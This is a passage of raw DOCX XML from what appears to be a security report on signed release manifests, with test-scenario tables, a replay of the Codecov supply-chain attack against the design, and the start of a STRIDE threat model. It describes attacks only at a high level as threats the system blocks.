        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expected outcome</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1 Legitimate release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None: build → hash → sign → verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS → DEPLOY</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2 Codecov-style tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential-exfiltration line appended to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>uploader.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> after signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HASH_MISMATCH → BLOCK</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3A Rogue key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker generates a key and signs as "Attacker Impersonator"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY → BLOCK</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3B Revoked key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Release signed with a leaked key that the vendor revoked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Signer refuses; verifier returns REVOKED → BLOCK</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4 Replay / downgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest claims blacklisted version 0.8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>BLOCKED (revoked version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2041"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3855"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manifest field changed without re-signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE → BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECURITY ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1 How the Design Withstands the Original Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Replaying the Codecov attack against the design</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="6350"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage of the Codecov attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Outcome with our system</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Storage credential leaked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Write access to storage does not let the attacker sign. Customers accept only manifests signed with the vendor's private key (HSM/KMS in production).</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Uploader modified in the bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The recomputed SHA-256 no longer matches the signed manifest: HASH_MISMATCH, pipeline blocked (Test 2, Scenario 2).</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Attacker also edits the manifest hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Any change to the manifest breaks the Ed25519 signature: INVALID_SIGNATURE (Test 6).</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Attacker signs with a key of their own</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The key ID and signer are not in the admission policy: UNAUTHORIZED_KEY (Tests 4 and 8, Scenario 3A).</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Attacker uses a leaked vendor key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Once the key is in the revocation list, the signer refuses it and the verifier returns REVOKED (Test 5, Scenario 3B).</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Served over valid HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Irrelevant to the decision: trust comes from the signature, not the server or channel.</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Script executed in customer CI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The gate runs before execution and exits with 1, so the script never runs.</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Undetected for about two months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detection is automatic on every download in every pipeline, and each block is logged.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.2 Threat Model (STRIDE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Threats were identified with the STRIDE method [11] (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6.2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>STRIDE threat model</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="1474"/>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="1360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Asset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expected result</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Artifact (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="14"/>
              </w:rPr>
              <w:t>uploader.sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</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87"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inject exfiltration code in bucket/CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implicit trust in downloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SHA-256 vs signed manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1361"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HASH_MISMATCH → BLOCK</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Build pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1247"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tampering, EoP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1587"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Inject code during build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1474"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unverified build output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
